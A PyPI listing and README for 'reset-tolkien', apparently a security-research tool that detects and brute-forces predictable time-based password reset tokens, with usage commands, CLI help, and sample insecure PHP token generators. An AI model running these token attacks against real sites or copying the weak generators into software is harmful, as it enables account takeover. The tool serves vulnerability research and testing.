reset-tolkien


Namereset-tolkien JSON
Version 1.3.4 PyPI version JSON
download
home_pageNone
SummaryUnsecure time-based secret exploitation and Sandwich attack implementation.
upload_time2024-12-09 19:34:07
maintainerNone
docs_urlNone
authorNone
requires_python>=3.10
licenseMIT License Copyright (c) 2024 Tom Chambaretaud Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
keywords security secret reset token tolkien
VCS
bugtrack_url
requirements dateparser hi-dateinfer python-dateutil pytz PyYAML regex shortuuid six tqdm typing_extensions tzlocal
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # Reset Tolkien

## Unsecure time-based secret exploitation and Sandwich attack implementation 

![image.png](image.png)

This tool is the result of research into "Unsecure time-based secrets" from this article:
- [\[EN\] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the "Reset Tolkien" tool](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)

To better understand how to use this tool, we strongly recommend that you read it first.

> *Yeah, this tool is based on a rather grotesque pun.*

- - -

## Installation

Install from [pip](https://pypi.org/project/reset-tolkien/):

```
▶ pip install reset-tolkien
```

## Installation from Docker

```
▶ git clone https://github.com/AethliosIK/reset-tolkien.git
▶ cd reset-tolkien
▶ docker build -t reset-tolkien:latest . 
▶ docker run --rm -it --net=host -v "$PWD:/reset-tolkien/" reset-tolkien:latest -h
```

## Usage

To detect whether a token is time-based, simply use this command:

```bash
$ reset-tolkien detect 660430516ffcf -d "Wed, 27 Mar 2024 14:42:25 GMT" --prefixes "attacker@example.com" --suffixes "attacker@example.com" --timezone "-7"
The token may be based on a timestamp: 1711550545.458703 (prefix: None / suffix: None)
The convertion logic is "uniqid"
```

To attack this token, use this command to export possible tokens:

```bash
$ reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format="uniqid"
Tokens have been exported in "output.txt"
```

## Encoding and hash function supported

The tool recursively tests different token formats:
- `base32`
- `base64`
- `urlencode`
- `hexint`
- `hexstr`: ASCII integer encoding
- `uniqid`: the PHP function `uniqid` previously studied
- `uuidv1`: the format of a time-based UUID Version 1
- `shortuuid`: a popular UUID encoding function
- `mongodb_objectid`: the Mongo DB data format studied above
- `datetime`: the encoding of a date from a custom date format
- `datetimeRFC2822`: encoding a date using the format from the RFC2822 standard

The tool also manages the most popular hash functions:
- `md5`
- `sha1`
- `sha224`
- `sha256`
- `sha384`
- `sha512`
- `sha3_224`
- `sha3_256`
- `sha3_384`
- `sha3_512`
- `blake_256`
- `blake_512`

## Help

```bash
usage: reset-tolkien [-h] [-v] {detect,bruteforce,sandwich} ...

Reset Tolkien can be used to find out whether a provided token is based on a
timestamp, from a timestamp corresponding to the period in which it was
generated.

options:
  -h, --help            show this help message and exit
  -v, --version         Print tool version

action:
  {detect,bruteforce,sandwich}
    detect              Detect the format of reset token
    bruteforce          Attack the reset token
    sandwich            Attack the reset token with sandwich method
```

The various features of the tool are as follows:
- `detect`: detects whether a provided token is based on a date, provided or not:

```bash
usage: reset-tolkien detect [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]
                     [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                     [--only-int-timestamp] [--decimal-length DECIMAL_LENGTH]
                     [--int-timestamp-range INT_TIMESTAMP_RANGE]
                     [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                     [--timezone TIMEZONE] [-l {1,2,3}] [-t TIMESTAMP]
                     [-d DATETIME] [--datetime-format DATETIME_FORMAT]
                     [--prefixes PREFIXES] [--suffixes SUFFIXES]
                     [--hashes HASHES]
                     token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -l {1,2,3}, --level {1,2,3}
                        Level of search depth (default: 3)
  -t TIMESTAMP, --timestamp TIMESTAMP
                        The timestamp of the reset request
  -d DATETIME, --datetime DATETIME
                        The datetime of the reset request
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:38:41 UTC")
  --prefixes PREFIXES   List of possible values for the prefix concatenated
                        with the timestamp. Format: prefix1,prefix2
  --suffixes SUFFIXES   List of possible values for the suffix concatenated
                        with the timestamp. Format: suffix1,suffix2
  --hashes HASHES       List of possible hashes to try to detect the format.
                        Format: suffix1,suffix2 (default: all identified hash)
```

- `bruteforce`:  provides a list of possible tokens from an arbitrarily defined token format and time frame:

```bash
usage: reset-tolkien bruteforce [-h] [-r] [-v {0,1,2}] [-c CONFIG]
                         [--threads THREADS]
                         [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                         [--only-int-timestamp]
                         [--decimal-length DECIMAL_LENGTH]
                         [--int-timestamp-range INT_TIMESTAMP_RANGE]
                         [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                         [--timezone TIMEZONE] [-t TIMESTAMP] [-d DATETIME]
                         [--datetime-format DATETIME_FORMAT]
                         [--token-format TOKEN_FORMAT] [--prefix PREFIX]
                         [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]
                         token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -t TIMESTAMP, --timestamp TIMESTAMP
                        The timestamp of the reset request with victim email
  -d DATETIME, --datetime DATETIME
                        The datetime of the reset request with victim email
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:40:15 UTC")
  --token-format TOKEN_FORMAT
                        The token encoding/hashing format - Format:
                        encoding1,encoding2
  --prefix PREFIX       The prefix value concatenated with the timestamp.
  --suffix SUFFIX       The suffix value concatenated with the timestamp.
  -o OUTPUT, --output OUTPUT
                        The filename of the output
  --with-timestamp      Write the output with timestamp
```

- `sandwich`: provides a list of possible tokens based on a token format and a time frame bounded by two dates:

```bash
usage: reset-tolkien sandwich [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]
                       [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                       [--only-int-timestamp]
                       [--decimal-length DECIMAL_LENGTH]
                       [--int-timestamp-range INT_TIMESTAMP_RANGE]
                       [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                       [--timezone TIMEZONE] [-bt BEGIN_TIMESTAMP]
                       [-et END_TIMESTAMP] [-bd BEGIN_DATETIME]
                       [-ed END_DATETIME] [--datetime-format DATETIME_FORMAT]
                       [--token-format TOKEN_FORMAT] [--prefix PREFIX]
                       [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]
                       token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -bt BEGIN_TIMESTAMP, --begin-timestamp BEGIN_TIMESTAMP
                        The begin timestamp of the reset request with victim
                        email
  -et END_TIMESTAMP, --end-timestamp END_TIMESTAMP
                        The end timestamp of the reset request with victim
                        email
  -bd BEGIN_DATETIME, --begin-datetime BEGIN_DATETIME
                        The begin datetime of the reset request with victim
                        email
  -ed END_DATETIME, --end-datetime END_DATETIME
                        The end datetime of the reset request with victim
                        email
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:40:54 UTC")
  --token-format TOKEN_FORMAT
                        The token encoding/hashing format - Format:
                        encoding1,encoding2
  --prefix PREFIX       The prefix value concatenated with the timestamp.
  --suffix SUFFIX       The suffix value concatenated with the timestamp.
  -o OUTPUT, --output OUTPUT
                        The filename of the output
  --with-timestamp      Write the output with timestamp
```

## VI.4 - Default tests

By default, the tool is configured to detect this type of time-based token generation:

```php
function getToken($level, $email)
{
    switch ($level) {
        case 1:
            return uniqid();
        case 2:
            return hash(time());
        case 3:
            return hash(uniqid());
        case 4:
            return hash(uniqid() . $email);
        case 5:
            return hash(date(DATE_RFC2822));
        case 6:
            return hash($email . uniqid() . $email);
        case 7:
            return uuid1("Test");
    }
}
```

## Customised test configuration

In addition, the tool allows you to define your own token formats before applying a hash function via a `TimestampHashFormat` object. For example, to test whether the token is generated using this token generation function:

```python
# Generate a formatted token
def generate_token():
    import datetime
    import hashlib
    
    t = datetime.datetime.utcnow().timestamp()
    token = hashlib.md5(uniqid(t).encode()).hexdigest()
    return token
```

This can be defined in the YAML configuration file:

```yaml
float-uniqid:
  description: "Uniqid timestamp"
  level: 2
  timestamp_type: float
  formats:
    - uniqid
```

## The "Todo" list

Of course, as with any tool, there is always the possibility of adding new features to complement it.

Among the points that would be very useful:
- **Format management via [Abstract syntax tree](https://docs.python.org/3/library/ast.html)**: the tool currently only manages formats applied in a linear way, so a simple format like `md5(timestamp()+1)` won't be supported. By configuring formats as a tree, this type of format can be supported by the tool.
- **Better application of user-specific information**: when detecting a token format, it is possible to define user-specific information as prefixes or suffixes of the token generation date. Many other configurations could be possible.
- **Management of other dynamic variables**: the tool detects formats and allows attacks based on the only variable supported: time. However, some formats can have several variables that evolve.
- **Addition of new supported formats**: the tool only supports the time-based functions found during my research, but many other formats should still exist and could also be supported by the tool.

## Changelog

You could retrieve changes for each version from [CHANGELOG.md](CHANGELOG.md).

## Licensing

This project is licensed under the [MIT license](LICENSE).

## Credit

- Main illustration: service provided by [@valentin.froute](https://www.instagram.com/valentin.froute/).

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "reset-tolkien",
    "maintainer": null,
    "docs_url": null,
    "requires_python": ">=3.10",
    "maintainer_email": "Tom CHAMBARETAUD <contact@aeth.cc>",
    "keywords": "security, secret, reset, token, tolkien",
    "author": null,
    "author_email": "Tom CHAMBARETAUD <contact@aeth.cc>",
    "download_url": "https://files.pythonhosted.org/packages/90/32/550bd6461d09b013e6e798d2dcfb124eeaad4657fdb56cbd32b00b9817e8/reset_tolkien-1.3.4.tar.gz",
    "platform": null,
    "description": "# Reset Tolkien\n\n## Unsecure time-based secret exploitation and Sandwich attack implementation \n\n![image.png](image.png)\n\nThis tool is the result of research into \"Unsecure time-based secrets\" from this article:\n- [\\[EN\\] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the \"Reset Tolkien\" tool](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)\n\nTo better understand how to use this tool, we strongly recommend that you read it first.\n\n> *Yeah, this tool is based on a rather grotesque pun.*\n\n- - -\n\n## Installation\n\nInstall from [pip](https://pypi.org/project/reset-tolkien/):\n\n```\n\u25b6 pip install reset-tolkien\n```\n\n## Installation from Docker\n\n```\n\u25b6 git clone https://github.com/AethliosIK/reset-tolkien.git\n\u25b6 cd reset-tolkien\n\u25b6 docker build -t reset-tolkien:latest . \n\u25b6 docker run --rm -it --net=host -v \"$PWD:/reset-tolkien/\" reset-tolkien:latest -h\n```\n\n## Usage\n\nTo detect whether a token is time-based, simply use this command:\n\n```bash\n$ reset-tolkien detect 660430516ffcf -d \"Wed, 27 Mar 2024 14:42:25 GMT\" --prefixes \"attacker@example.com\" --suffixes \"attacker@example.com\" --timezone \"-7\"\nThe token may be based on a timestamp: 1711550545.458703 (prefix: None / suffix: None)\nThe convertion logic is \"uniqid\"\n```\n\nTo attack this token, use this command to export possible tokens:\n\n```bash\n$ reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format=\"uniqid\"\nTokens have been exported in \"output.txt\"\n```\n\n## Encoding and hash function supported\n\nThe tool recursively tests different token formats:\n- `base32`\n- `base64`\n- `urlencode`\n- `hexint`\n- `hexstr`: ASCII integer encoding\n- `uniqid`: the PHP function `uniqid` previously studied\n- `uuidv1`: the format of a time-based UUID Version 1\n- `shortuuid`: a popular UUID encoding function\n- `mongodb_objectid`: the Mongo DB data format studied above\n- `datetime`: the encoding of a date from a custom date format\n- `datetimeRFC2822`: encoding a date using the format from the RFC2822 standard\n\nThe tool also manages the most popular hash functions:\n- `md5`\n- `sha1`\n- `sha224`\n- `sha256`\n- `sha384`\n- `sha512`\n- `sha3_224`\n- `sha3_256`\n- `sha3_384`\n- `sha3_512`\n- `blake_256`\n- `blake_512`\n\n## Help\n\n```bash\nusage: reset-tolkien [-h] [-v] {detect,bruteforce,sandwich} ...\n\nReset Tolkien can be used to find out whether a provided token is based on a\ntimestamp, from a timestamp corresponding to the period in which it was\ngenerated.\n\noptions:\n  -h, --help            show this help message and exit\n  -v, --version         Print tool version\n\naction:\n  {detect,bruteforce,sandwich}\n    detect              Detect the format of reset token\n    bruteforce          Attack the reset token\n    sandwich            Attack the reset token with sandwich method\n```\n\nThe various features of the tool are as follows:\n- `detect`: detects whether a provided token is based on a date, provided or not:\n\n```bash\nusage: reset-tolkien detect [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]\n                     [--date-format-of-token DATE_FORMAT_OF_TOKEN]\n                     [--only-int-timestamp] [--decimal-length DECIMAL_LENGTH]\n                     [--int-timestamp-range INT_TIMESTAMP_RANGE]\n                     [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]\n                     [--timezone TIMEZONE] [-l {1,2,3}] [-t TIMESTAMP]\n                     [-d DATETIME] [--datetime-format DATETIME_FORMAT]\n                     [--prefixes PREFIXES] [--suffixes SUFFIXES]\n                     [--hashes HASHES]\n                     token\n\npositional arguments:\n  token                 The token given as input.\n\noptions:\n  -h, --help            show this help message and exit\n  -r, --roleplay        Not recommended if you don't have anything else to do\n  -v {0,1,2}, --verbosity {0,1,2}\n                        Verbosity level (default: 0)\n  -c CONFIG, --config CONFIG\n                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)\n  --threads THREADS     Define the number of parallelized tasks for the\n                        decryption attack on the hash. (default: 8)\n  --date-format-of-token DATE_FORMAT_OF_TOKEN\n                        Date format for the token - please set it if you have\n                        found a date as input.\n  --only-int-timestamp  Only use integer timestamp. (default: False)\n  --decimal-length DECIMAL_LENGTH\n                        Length of the float timestamp (default: 7)\n  --int-timestamp-range INT_TIMESTAMP_RANGE\n                        Time range over which the int timestamp will be tested\n                        before and after the input value (default: 60s)\n  --float-timestamp-range FLOAT_TIMESTAMP_RANGE\n                        Time range over which the float timestamp will be\n                        tested before and after the input value (default: 2s)\n  --timezone TIMEZONE   Timezone of the application for datetime value\n                        (default: 0)\n  -l {1,2,3}, --level {1,2,3}\n                        Level of search depth (default: 3)\n  -t TIMESTAMP, --timestamp TIMESTAMP\n                        The timestamp of the reset request\n  -d DATETIME, --datetime DATETIME\n                        The datetime of the reset request\n  --datetime-format DATETIME_FORMAT\n                        The input datetime format (default: server date format\n                        like \"Sun, 30 Jun 2024 01:38:41 UTC\")\n  --prefixes PREFIXES   List of possible values for the prefix concatenated\n                        with the timestamp. Format: prefix1,prefix2\n  --suffixes SUFFIXES   List of possible values for the suffix concatenated\n                        with the timestamp. Format: suffix1,suffix2\n  --hashes HASHES       List of possible hashes to try to detect the format.\n                        Format: suffix1,suffix2 (default: all identified hash)\n```\n\n- `bruteforce`:  provides a list of possible tokens from an arbitrarily defined token format and time frame:\n\n```bash\nusage: reset-tolkien bruteforce [-h] [-r] [-v {0,1,2}] [-c CONFIG]\n                         [--threads THREADS]\n                         [--date-format-of-token DATE_FORMAT_OF_TOKEN]\n                         [--only-int-timestamp]\n                         [--decimal-length DECIMAL_LENGTH]\n                         [--int-timestamp-range INT_TIMESTAMP_RANGE]\n                         [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]\n                         [--timezone TIMEZONE] [-t TIMESTAMP] [-d DATETIME]\n                         [--datetime-format DATETIME_FORMAT]\n                         [--token-format TOKEN_FORMAT] [--prefix PREFIX]\n                         [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]\n                         token\n\npositional arguments:\n  token                 The token given as input.\n\noptions:\n  -h, --help            show this help message and exit\n  -r, --roleplay        Not recommended if you don't have anything else to do\n  -v {0,1,2}, --verbosity {0,1,2}\n                        Verbosity level (default: 0)\n  -c CONFIG, --config CONFIG\n                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)\n  --threads THREADS     Define the number of parallelized tasks for the\n                        decryption attack on the hash. (default: 8)\n  --date-format-of-token DATE_FORMAT_OF_TOKEN\n                        Date format for the token - please set it if you have\n                        found a date as input.\n  --only-int-timestamp  Only use integer timestamp. (default: False)\n  --decimal-length DECIMAL_LENGTH\n                        Length of the float timestamp (default: 7)\n  --int-timestamp-range INT_TIMESTAMP_RANGE\n                        Time range over which the int timestamp will be tested\n                        before and after the input value (default: 60s)\n  --float-timestamp-range FLOAT_TIMESTAMP_RANGE\n                        Time range over which the float timestamp will be\n                        tested before and after the input value (default: 2s)\n  --timezone TIMEZONE   Timezone of the application for datetime value\n                        (default: 0)\n  -t TIMESTAMP, --timestamp TIMESTAMP\n                        The timestamp of the reset request with victim email\n  -d DATETIME, --datetime DATETIME\n                        The datetime of the reset request with victim email\n  --datetime-format DATETIME_FORMAT\n                        The input datetime format (default: server date format\n                        like \"Sun, 30 Jun 2024 01:40:15 UTC\")\n  --token-format TOKEN_FORMAT\n                        The token encoding/hashing format - Format:\n                        encoding1,encoding2\n  --prefix PREFIX       The prefix value concatenated with the timestamp.\n  --suffix SUFFIX       The suffix value concatenated with the timestamp.\n  -o OUTPUT, --output OUTPUT\n                        The filename of the output\n  --with-timestamp      Write the output with timestamp\n```\n\n- `sandwich`: provides a list of possible tokens based on a token format and a time frame bounded by two dates:\n\n```bash\nusage: reset-tolkien sandwich [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]\n                       [--date-format-of-token DATE_FORMAT_OF_TOKEN]\n                       [--only-int-timestamp]\n                       [--decimal-length DECIMAL_LENGTH]\n                       [--int-timestamp-range INT_TIMESTAMP_RANGE]\n                       [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]\n                       [--timezone TIMEZONE] [-bt BEGIN_TIMESTAMP]\n                       [-et END_TIMESTAMP] [-bd BEGIN_DATETIME]\n                       [-ed END_DATETIME] [--datetime-format DATETIME_FORMAT]\n                       [--token-format TOKEN_FORMAT] [--prefix PREFIX]\n                       [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]\n                       token\n\npositional arguments:\n  token                 The token given as input.\n\noptions:\n  -h, --help            show this help message and exit\n  -r, --roleplay        Not recommended if you don't have anything else to do\n  -v {0,1,2}, --verbosity {0,1,2}\n                        Verbosity level (default: 0)\n  -c CONFIG, --config CONFIG\n                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)\n  --threads THREADS     Define the number of parallelized tasks for the\n                        decryption attack on the hash. (default: 8)\n  --date-format-of-token DATE_FORMAT_OF_TOKEN\n                        Date format for the token - please set it if you have\n                        found a date as input.\n  --only-int-timestamp  Only use integer timestamp. (default: False)\n  --decimal-length DECIMAL_LENGTH\n                        Length of the float timestamp (default: 7)\n  --int-timestamp-range INT_TIMESTAMP_RANGE\n                        Time range over which the int timestamp will be tested\n                        before and after the input value (default: 60s)\n  --float-timestamp-range FLOAT_TIMESTAMP_RANGE\n                        Time range over which the float timestamp will be\n                        tested before and after the input value (default: 2s)\n  --timezone TIMEZONE   Timezone of the application for datetime value\n                        (default: 0)\n  -bt BEGIN_TIMESTAMP, --begin-timestamp BEGIN_TIMESTAMP\n                        The begin timestamp of the reset request with victim\n                        email\n  -et END_TIMESTAMP, --end-timestamp END_TIMESTAMP\n                        The end timestamp of the reset request with victim\n                        email\n  -bd BEGIN_DATETIME, --begin-datetime BEGIN_DATETIME\n                        The begin datetime of the reset request with victim\n                        email\n  -ed END_DATETIME, --end-datetime END_DATETIME\n                        The end datetime of the reset request with victim\n                        email\n  --datetime-format DATETIME_FORMAT\n                        The input datetime format (default: server date format\n                        like \"Sun, 30 Jun 2024 01:40:54 UTC\")\n  --token-format TOKEN_FORMAT\n                        The token encoding/hashing format - Format:\n                        encoding1,encoding2\n  --prefix PREFIX       The prefix value concatenated with the timestamp.\n  --suffix SUFFIX       The suffix value concatenated with the timestamp.\n  -o OUTPUT, --output OUTPUT\n                        The filename of the output\n  --with-timestamp      Write the output with timestamp\n```\n\n## VI.4 - Default tests\n\nBy default, the tool is configured to detect this type of time-based token generation:\n\n```php\nfunction getToken($level, $email)\n{\n    switch ($level) {\n        case 1:\n            return uniqid();\n        case 2:\n            return hash(time());\n        case 3:\n            return hash(uniqid());\n        case 4:\n            return hash(uniqid() . $email);\n        case 5:\n            return hash(date(DATE_RFC2822));\n        case 6:\n            return hash($email . uniqid() . $email);\n        case 7:\n            return uuid1(\"Test\");\n    }\n}\n```\n\n## Customised test configuration\n\nIn addition, the tool allows you to define your own token formats before applying a hash function via a `TimestampHashFormat` object. For example, to test whether the token is generated using this token generation function:\n\n```python\n# Generate a formatted token\ndef generate_token():\n    import datetime\n    import hashlib\n    \n    t = datetime.datetime.utcnow().timestamp()\n    token = hashlib.md5(uniqid(t).encode()).hexdigest()\n    return token\n```\n\nThis can be defined in the YAML configuration file:\n\n```yaml\nfloat-uniqid:\n  description: \"Uniqid timestamp\"\n  level: 2\n  timestamp_type: float\n  formats:\n    - uniqid\n```\n\n## The \"Todo\" list\n\nOf course, as with any tool, there is always the possibility of adding new features to complement it.\n\nAmong the points that would be very useful:\n- **Format management via [Abstract syntax tree](https://docs.python.org/3/library/ast.html)**: the tool currently only manages formats applied in a linear way, so a simple format like `md5(timestamp()+1)` won't be supported. By configuring formats as a tree, this type of format can be supported by the tool.\n- **Better application of user-specific information**: when detecting a token format, it is possible to define user-specific information as prefixes or suffixes of the token generation date. Many other configurations could be possible.\n- **Management of other dynamic variables**: the tool detects formats and allows attacks based on the only variable supported: time. However, some formats can have several variables that evolve.\n- **Addition of new supported formats**: the tool only supports the time-based functions found during my research, but many other formats should still exist and could also be supported by the tool.\n\n## Changelog\n\nYou could retrieve changes for each version from [CHANGELOG.md](CHANGELOG.md).\n\n## Licensing\n\nThis project is licensed under the [MIT license](LICENSE).\n\n## Credit\n\n- Main illustration: service provided by [@valentin.froute](https://www.instagram.com/valentin.froute/).\n",
    "bugtrack_url": null,
    "license": "MIT License  Copyright (c) 2024 Tom Chambaretaud  Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:  The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.  THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ",
    "summary": "Unsecure time-based secret exploitation and Sandwich attack implementation.",
    "version": "1.3.4",
    "project_urls": {
        "Changelog": "https://github.com/AethliosIK/reset-tolkien/blob/master/CHANGELOG.md",
        "Homepage": "https://github.com/AethliosIK/reset-tolkien",
        "Issues": "https://github.com/AethliosIK/reset-tolkien/issues",
        "Repository": "https://github.com/AethliosIK/reset-tolkien"
    },
    "split_keywords": [
        "security",
        " secret",
        " reset",
        " token",
        " tolkien"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "4fda435cb4d68f9aadf385deb028b5b3607cc0ebdd34d1a3f579ee23959e0b72",
                "md5": "68979f92e46b89bdaa96214a71fe5bdb",
                "sha256": "11010a12a089c87e65058cb493a012de12d0503d6a02a0ae15149f479ceefaf5"
            },
            "downloads": -1,
            "filename": "reset_tolkien-1.3.4-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "68979f92e46b89bdaa96214a71fe5bdb",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": ">=3.10",
            "size": 28273,
            "upload_time": "2024-12-09T19:34:05",
            "upload_time_iso_8601": "2024-12-09T19:34:05.355259Z",
            "url": "https://files.pythonhosted.org/packages/4f/da/435cb4d68f9aadf385deb028b5b3607cc0ebdd34d1a3f579ee23959e0b72/reset_tolkien-1.3.4-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "9032550bd6461d09b013e6e798d2dcfb124eeaad4657fdb56cbd32b00b9817e8",
                "md5": "f2a3b35479faf1369b5dc6ef75fc63e2",
                "sha256": "562e1b82845d2eda088ce9c853b241874b42e65ca3715041b443eca81378a233"
            },
            "downloads": -1,
            "filename": "reset_tolkien-1.3.4.tar.gz",
            "has_sig": false,
            "md5_digest": "f2a3b35479faf1369b5dc6ef75fc63e2",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.10",
            "size": 29164,
            "upload_time": "2024-12-09T19:34:07",
            "upload_time_iso_8601": "2024-12-09T19:34:07.545856Z",
            "url": "https://files.pythonhosted.org/packages/90/32/550bd6461d09b013e6e798d2dcfb124eeaad4657fdb56cbd32b00b9817e8/reset_tolkien-1.3.4.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-12-09 19:34:07",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "AethliosIK",
    "github_project": "reset-tolkien",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [
        {
            "name": "dateparser",
            "specs": [
                [
                    "==",
                    "1.1.8"
                ]
            ]
        },
        {
            "name": "hi-dateinfer",
            "specs": [
                [
                    "==",
                    "0.4.6"
                ]
            ]
        },
        {
            "name": "python-dateutil",
            "specs": [
                [
                    "==",
                    "2.9.0.post0"
                ]
            ]
        },
        {
            "name": "pytz",
            "specs": [
                [
                    "==",
                    "2024.2"
                ]
            ]
        },
        {
            "name": "PyYAML",
            "specs": [
                [
                    "==",
                    "6.0.1"
                ]
            ]
        },
        {
            "name": "regex",
            "specs": [
                [
                    "==",
                    "2024.9.11"
                ]
            ]
        },
        {
            "name": "shortuuid",
            "specs": [
                [
                    "==",
                    "1.0.11"
                ]
            ]
        },
        {
            "name": "six",
            "specs": [
                [
                    "==",
                    "1.16.0"
                ]
            ]
        },
        {
            "name": "tqdm",
            "specs": [
                [
                    "==",
                    "4.66.5"
                ]
            ]
        },
        {
            "name": "typing_extensions",
